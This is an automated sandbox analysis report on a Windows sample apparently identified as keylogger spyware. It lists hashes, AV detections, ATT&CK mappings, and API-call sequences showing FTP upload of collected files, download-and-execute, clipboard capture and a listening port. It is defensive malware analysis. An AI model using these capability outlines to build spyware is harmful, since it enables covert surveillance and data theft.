Play interactive tour

Edit tour

Analysis Report executable.4420.exe

Overview

General Information

Sample Name:	executable.4420.exe
Analysis ID:	356831
MD5:	6192cfbe8e44360f7c0b6f696206f41d
SHA1:	166886066ffabb76f6b72c4b4ed91fa19e59987a
SHA256:	8e353600579959f0507d00376d2e56e8c9a24648b2574ee72fa81dec5d70874a
Infos:
Most interesting Screenshot:

Detection

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Machine Learning detection for sample

Contains functionality for read data from the clipboard

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to read the clipboard data

Contains functionality to upload files via FTP

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Startup

System is w10x64

executable.4420.exe (PID: 5412 cmdline: 'C:\Users\user\Desktop\executable.4420.exe' MD5: 6192CFBE8E44360F7C0B6F696206F41D)

WerFault.exe (PID: 2100 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 672 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: executable.4420.exe

Avira: detected

Multi AV Scanner detection for submitted file

Show sources

Source: executable.4420.exe

ReversingLabs: Detection: 74%

Machine Learning detection for sample

Show sources

Source: executable.4420.exe

Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files

Show sources

Source: executable.4420.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Spreading:

Source: C:\Users\user\Desktop\executable.4420.exe	Code function: 0_2_00428DCB memset,FindFirstFileA,FindClose,	0_2_00428DCB
Source: C:\Users\user\Desktop\executable.4420.exe	Code function: 0_2_004251F0 __EH_prolog,#536,#924,#922,#924,#800,#800,#800,FindFirstFileA,#537,#537,#922,#923,#922,DeleteFileA,#800,#800,#800,#800,#800,FindNextFileA,FindClose,#800,	0_2_004251F0
Source: C:\Users\user\Desktop\executable.4420.exe	Code function: 0_2_004255B0 __EH_prolog,#537,#924,#922,#800,#800,FindFirstFileA,sscanf,sscanf,sscanf,#551,#3337,#3337,#3337,#3337,#3337,#3337,#551,FindNextFileA,FindClose,#800,	0_2_004255B0
Source: C:\Users\user\Desktop\executable.4420.exe	Code function: 0_2_004247C9 __EH_prolog,#537,#924,#922,#800,#800,#3811,FindFirstFileA,sscanf,sscanf,sscanf,#551,#536,#924,#922,#924,#800,#800,#800,DeleteFileA,#800,FindNextFileA,FindClose,#800,	0_2_004247C9

Networking:

Source: C:\Users\user\Desktop\executable.4420.exe	Code function: 0_2_004258FF __EH_prolog,#3811,#924,#924,#924,#924,#924,#924,#858,#858,#858,#3790,#3790,#3790,#540,#924,#858,#800,#537,#537,#922,#923,#922,#537,#924,#800,#800,#800,#800,#800,#800,#800,#3790,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,lstrcpyA,lstrcpyA,lstrcpyA,InternetOpenA,InternetCloseHandle,InternetConnectA,FtpSetCurrentDirectoryA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,GetComputerNameA,#3337,#3337,#3337,#3337,#3337,#3337,sprintf,FtpCreateDirectoryA,lstrcatA,lstrlenA,lstrcatA,lstrcatA,FtpSetCurrentDirectoryA,InternetCloseHandle,InternetCloseHandle,FtpPutFileA,FtpPutFileA,FtpPutFileA,FtpPutFileA,FtpPutFileA,DeleteFileA,#924,DeleteFileA,#800,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,#537,#537,#922,#923,#922,DeleteFileA,#800,#800,#800,#800,#800,#537,#537,#922,#924,#922,DeleteFileA,#800,#800,#800,#800,#800,GetUserNameA,#924,FtpPutFileA,DeleteFileA,#537,#922,#923,#800,#800,FtpCreateDirectoryA,#537,#537,#923,#922,#923,#800,#800,#800,#800,#924,#941,#924,FtpPutFileA,#800,#924,DeleteFileA,#800,#924,#924,DeleteFileA,#800,#800,#800,#800,#800,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,#924,#800,#800,#800,#800,#800,#800,#800,#800,#800,#800,	0_2_004258FF
Source: C:\Users\user\Desktop\executable.4420.exe	Code function: 0_2_0041B588 __EH_prolog,InternetGetConnectedState,#1199,GetDlgItem,EnableWindow,GetDlgItemTextA,GetDlgItemTextA,GetDlgItemTextA,GetDlgItemTextA,GetDlgItemTextA,GetDlgItemInt,lstrcpyA,IsDlgButtonChecked,InternetOpenA,#1199,GetDlgItem,EnableWindow,InternetCloseHandle,InternetConnectA,#1199,GetDlgItem,EnableWindow,FtpSetCurrentDirectoryA,lstrcpyA,FtpCreateDirectoryA,lstrlenA,lstrcatA,lstrcatA,FtpSetCurrentDirectoryA,#1199,GetDlgItem,EnableWindow,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,#924,CreateFileA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,WriteFile,CloseHandle,CloseHandle,FtpPutFileA,#1199,GetDlgItem,EnableWindow,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,DeleteFileA,GetDlgItem,EnableWindow,#1199,#800,#800,	0_2_0041B588
Source: C:\Users\user\Desktop\executable.4420.exe	Code function: 0_2_004276F1 __EH_prolog,lstrcpyA,lstrcpyA,InternetOpenA,InternetCloseHandle,InternetConnectA,FtpSetCurrentDirectoryA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,GetComputerNameA,GetUserNameA,#3811,#537,#537,#924,#922,#922,#800,#800,#800,#800,#537,#537,#926,#922,FtpPutFileA,#800,#800,#800,#800,DeleteFileA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,#800,	0_2_004276F1

Source: C:\Users\user\Desktop\executable.4420.exe

Code function: 0_2_0042221F __EH_prolog,#924,#537,#537,#922,URLDownloadToFileA,#800,#800,#800,memset,CreateFileA,ReadFile,CloseHandle,#800,CloseHandle,DeleteFileA,atoi,#1199,ShellExecuteA,#800,#800,

0_2_0042221F

Source: executable.4420.exe	String found in binary or memory: http://www.blazingtools.com/
Source: executable.4420.exe	String found in binary or memory: http://www.blazingtools.com/downloads.html
Source: executable.4420.exe	String found in binary or memory: http://www.blazingtools.com/orderbpk.html_This
Source: executable.4420.exe	String found in binary or memory: http://www.blazingtools.com/update.tmpupdates/bpk.dat

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: C:\Users\user\Desktop\executable.4420.exe

Code function: 0_2_00428E0F IsWindow,IsWindowUnicode,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,lstrlenW,#823,WideCharToMultiByte,#860,#825,#860,GlobalUnlock,CloseClipboard,

0_2_00428E0F

Source: C:\Users\user\Desktop\executable.4420.exe

0_2_00428E0F

System Summary:

Source: C:\Users\user\Desktop\executable.4420.exe	Code function: String function: 0043E4E0 appears 241 times
Source: C:\Users\user\Desktop\executable.4420.exe	Code function: String function: 0043DE26 appears 82 times

Source: unknown

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 672

Source: executable.4420.exe, 00000000.00000002.226322068.0000000000970000.00000002.00000001.sdmp

Binary or memory string: OriginalFilenameMFC42.DLL.MUIR vs executable.4420.exe

Source: executable.4420.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal60.winEXE@2/4@0/0

Source: C:\Users\user\Desktop\executable.4420.exe

Code function: 0_2_0041C947 GetLastError,FormatMessageA,MessageBoxA,LocalFree,

0_2_0041C947

Source: C:\Users\user\Desktop\executable.4420.exe

Code function: 0_2_004288B3 CreateToolhelp32Snapshot,Module32First,Module32Next,memcpy,CloseHandle,

0_2_004288B3

Source: C:\Users\user\Desktop\executable.4420.exe

Code function: 0_2_00429112 CoCreateInstance,

0_2_00429112

Source: C:\Users\user\Desktop\executable.4420.exe

Code function: 0_2_0042980F #1168,FindResourceA,#1168,SizeofResource,LoadResource,LockResource,#537,#538,

0_2_0042980F

Source: C:\Users\user\Desktop\executable.4420.exe

File created: C:\Users\user\AppData\Roaming\BPK\

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5412

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D2F.tmp

Jump to behavior

Source: executable.4420.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\executable.4420.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: executable.4420.exe

ReversingLabs: Detection: 74%

Source: unknown	Process created: C:\Users\user\Desktop\executable.4420.exe 'C:\Users\user\Desktop\executable.4420.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 672

Data Obfuscation:

Source: C:\Users\user\Desktop\executable.4420.exe

Code function: 0_2_00428AD2 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00428AD2

Source: C:\Users\user\Desktop\executable.4420.exe	Code function: 0_2_0043E4E0 push eax; ret		0_2_0043E4FE
Source: C:\Users\user\Desktop\executable.4420.exe	Code function: 0_2_0043E690 push eax; ret		0_2_0043E6BE

Persistence and Installation Behavior:

Source: C:\Users\user\Desktop\executable.4420.exe

Code function: 0_2_0042221F __EH_prolog,#924,#537,#537,#922,URLDownloadToFileA,#800,#800,#800,memset,CreateFileA,ReadFile,CloseHandle,#800,CloseHandle,DeleteFileA,atoi,#1199,ShellExecuteA,#800,#800,

0_2_0042221F

Hooking and other Techniques for Hiding and Protection:

Source: C:\Windows\SysWOW64\WerFault.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\executable.4420.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\executable.4420.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\executable.4420.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Source: C:\Users\user\Desktop\executable.4420.exe

API coverage: 3.8 %

Source: C:\Users\user\Desktop\executable.4420.exe	Code function: 0_2_0042AAFA GetSystemTime followed by cmp: cmp word ptr [ebp-10h], 0005h and CTI: jbe 0042AB3Fh		0_2_0042AAFA
Source: C:\Users\user\Desktop\executable.4420.exe	Code function: 0_2_0042AAFA GetSystemTime followed by cmp: cmp word ptr [ebp-0eh], 0014h and CTI: jbe 0042AB4Ch		0_2_0042AAFA

Source: C:\Users\user\Desktop\executable.4420.exe	Code function: 0_2_00428DCB memset,FindFirstFileA,FindClose,	0_2_00428DCB
Source: C:\Users\user\Desktop\executable.4420.exe	Code function: 0_2_004251F0 __EH_prolog,#536,#924,#922,#924,#800,#800,#800,FindFirstFileA,#537,#537,#922,#923,#922,DeleteFileA,#800,#800,#800,#800,#800,FindNextFileA,FindClose,#800,	0_2_004251F0
Source: C:\Users\user\Desktop\executable.4420.exe	Code function: 0_2_004255B0 __EH_prolog,#537,#924,#922,#800,#800,FindFirstFileA,sscanf,sscanf,sscanf,#551,#3337,#3337,#3337,#3337,#3337,#3337,#551,FindNextFileA,FindClose,#800,	0_2_004255B0
Source: C:\Users\user\Desktop\executable.4420.exe	Code function: 0_2_004247C9 __EH_prolog,#537,#924,#922,#800,#800,#3811,FindFirstFileA,sscanf,sscanf,sscanf,#551,#536,#924,#922,#924,#800,#800,#800,DeleteFileA,#800,FindNextFileA,FindClose,#800,	0_2_004247C9

Anti Debugging:

Source: C:\Users\user\Desktop\executable.4420.exe

Code function: 0_2_00428AD2 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00428AD2

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\executable.4420.exe

Code function: 0_2_0042AAFA CreateFileA,GetSystemTime,SystemTimeToFileTime,SetFileTime,CloseHandle,

0_2_0042AAFA

Source: C:\Users\user\Desktop\executable.4420.exe

Code function: 0_2_004258FF __EH_prolog,#3811,#924,#924,#924,#924,#924,#924,#858,#858,#858,#3790,#3790,#3790,#540,#924,#858,#800,#537,#537,#922,#923,#922,#537,#924,#800,#800,#800,#800,#800,#800,#800,#3790,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,lstrcpyA,lstrcpyA,lstrcpyA,InternetOpenA,InternetCloseHandle,InternetConnectA,FtpSetCurrentDirectoryA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,GetComputerNameA,#3337,#3337,#3337,#3337,#3337,#3337,sprintf,FtpCreateDirectoryA,lstrcatA,lstrlenA,lstrcatA,lstrcatA,FtpSetCurrentDirectoryA,InternetCloseHandle,InternetCloseHandle,FtpPutFileA,FtpPutFileA,FtpPutFileA,FtpPutFileA,FtpPutFileA,DeleteFileA,#924,DeleteFileA,#800,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,#537,#537,#922,#923,#922,DeleteFileA,#800,#800,#800,#800,#800,#537,#537,#922,#924,#922,DeleteFileA,#800,#800,#800,#800,#800,GetUserNameA,#924,FtpPutFileA,DeleteFileA,#537,#922,#923,#800,#800,FtpCreateDirectoryA,#537,#537,#923,#922,#923,#800,#800,#800,#800,#924,#941,#924,FtpPutFileA,#800,#924,DeleteFileA,#800,#924,#924,DeleteFileA,#800,#800,#800,#800,#800,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,#924,#800,#800,#800,#800,#800,#800,#800,#800,#800,#800,

0_2_004258FF

Source: C:\Users\user\Desktop\executable.4420.exe

Code function: 0_2_00428A6B GetVersionExA,

0_2_00428A6B

Remote Access Functionality:

Source: C:\Users\user\Desktop\executable.4420.exe

Code function: 0_2_00410C1A strlen,memset,htons,inet_addr,gethostbyname,bind,memset,htons,inet_addr,gethostbyname,WSASetLastError,

0_2_00410C1A

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Path Interception	Process Injection1	Masquerading1	OS Credential Dumping	System Time Discovery11	Remote Services	Clipboard Data2	Exfiltration Over Alternative Protocol1	Ingress Tool Transfer11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection1	LSASS Memory	Query Registry1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Deobfuscate/Decode Files or Information1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	Account Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	System Owner/User Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	File and Directory Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery3	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
executable.4420.exe	74%	ReversingLabs	Win32.Spyware.Perfect
executable.4420.exe	100%	Avira	HEUR/AGEN.1112545
executable.4420.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.executable.4420.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1112545		Download File
0.0.executable.4420.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1112545		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.blazingtools.com/update.tmpupdates/bpk.dat	0%	Avira URL Cloud	safe
http://www.blazingtools.com/orderbpk.html_This	0%	Avira URL Cloud	safe
http://www.blazingtools.com/downloads.html	1%	Virustotal		Browse
http://www.blazingtools.com/downloads.html	0%	Avira URL Cloud	safe
http://www.blazingtools.com/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.blazingtools.com/update.tmpupdates/bpk.dat	executable.4420.exe	false	Avira URL Cloud: safe	unknown
http://www.blazingtools.com/orderbpk.html_This	executable.4420.exe	false	Avira URL Cloud: safe	unknown
http://www.blazingtools.com/downloads.html	executable.4420.exe	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.blazingtools.com/	executable.4420.exe	false	Avira URL Cloud: safe	unknown

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	356831
Start date:	23.02.2021
Start time:	17:38:41
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	executable.4420.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	34
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal60.winEXE@2/4@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 99.8% (good quality ratio 90.1%) Quality average: 71.8% Quality standard deviation: 31.1%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 13.64.90.137, 104.42.151.234, 23.211.6.115, 104.43.193.48, 40.88.32.150, 52.255.188.83, 184.30.24.56, 51.11.168.160, 8.250.157.254, 8.248.95.254, 8.238.27.126, 8.241.80.126, 8.248.123.254, 20.54.26.129, 92.122.213.194, 92.122.213.247, 52.155.217.156 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_executable.4420._c4d235e04f7d67dd8b9808a243ef65182404b_dc10a768_08086b39\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	11694
Entropy (8bit):	3.7672748277627535
Encrypted:	false
SSDEEP:	192:h/5h7gBgH/UJuLl+7jpLPAz/u7ssS274ItM/1c:tz/UJuLcjCz/u7ssX4It0c
MD5:	7A55A9DC34D7C94401B8ED3160BA0C72
SHA1:	F4AE306D576E833E6A99A8363306C07D9DD76A06
SHA-256:	35E4069BB231E06A148487DCAC11D00BE8A891927E7CC072221A7056F001F51C
SHA-512:	9B3C9B7EA90710D5C183686C7CB6977E33357DE869B25ED2D18182B7F94D65BE3CBD209640AE7837043826B243424205AF3939D4D7704BB80C276E5AF9D212E8
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.8.6.0.4.3.7.6.4.4.2.6.1.1.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.8.6.0.4.3.7.8.8.3.3.2.3.4.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.d.0.3.d.2.5.1.-.e.c.9.b.-.4.4.e.9.-.a.4.6.d.-.7.a.f.5.b.0.9.4.0.5.a.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.d.a.6.f.5.f.1.-.d.3.f.7.-.4.9.a.e.-.b.2.e.f.-.b.9.2.1.0.9.a.6.f.9.5.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.e.x.e.c.u.t.a.b.l.e...4.4.2.0...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.2.4.-.0.0.0.1.-.0.0.1.7.-.f.7.1.d.-.3.7.e.7.4.d.0.a.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.7.b.e.2.9.9.c.7.9.9.4.b.9.5.3.7.7.c.d.6.2.c.1.5.c.1.9.9.9.1.9.0.0.0.0.f.f.f.f.!.0.0.0.0.1.6.6.8.8.6.0.6.6.f.f.a.b.b.7.6.f.6.b.7.2.c.4.b.4.e.d.9.1.f.a.1.9.e.5.9.9.8.7.a.!.e.x.e.c.u.t.a.b.l.e...4.4.2.0...e.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D2F.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Feb 24 01:39:36 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	1080022
Entropy (8bit):	1.2269964489942033
Encrypted:	false
SSDEEP:	3072:eS293HEp5CUPF0iJTiSQCidYakBWg+vSsThybQv:eS29X65CUPF0iJTiSQCidYakEg+v9Qbm
MD5:	B9A9BEE69F8163C259E82977694A384E
SHA1:	500E77B794EB34E6B0A50D43FA8D767CE220D611
SHA-256:	EF357D66AA69B8ECAE3AA51BA7FF633B2C709DB23F74EEA1FC236F6C60018722
SHA-512:	018C33E5506E918DF09B1F4859D22AB2D97D5D3A53F85A0736CD1BDADA2C64CDD87862BDBD7158FDF6749D7744CA220BF54C595B2521C6ECADECC955DB9CC61B
Malicious:	false
Reputation:	low
Preview:	MDMP....... .......X.5`...................U...........B..............GenuineIntelW...........T.......$...U.5`.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER655E.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8320
Entropy (8bit):	3.693017369135634
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiUWV68nw6YSeSUh2sLgmfXlZS/LNCpDs89bXnisf79m:RrlsNiV68nw6YbSUh2ogmfLS/LsXnhfM
MD5:	C9E60060870D3B974BE4AFC5F943DBB3
SHA1:	66BFC2EE917214F25A0C603029918D30BCB8913F
SHA-256:	918D1EE2E7E2C757290948589858F1515FAC4E694A7236A4D155E0CD1971CE61
SHA-512:	AE855276116DCF22E25C23D3D800C4F974AC71C6A2C2AF10EEA556FC4D3F3F3D1413890BCD796B556B9A9DDEB0A5980F88DCEC3FB2C6AF56BAA568AFF42FEFCB
Malicious:	false
Reputation:	low
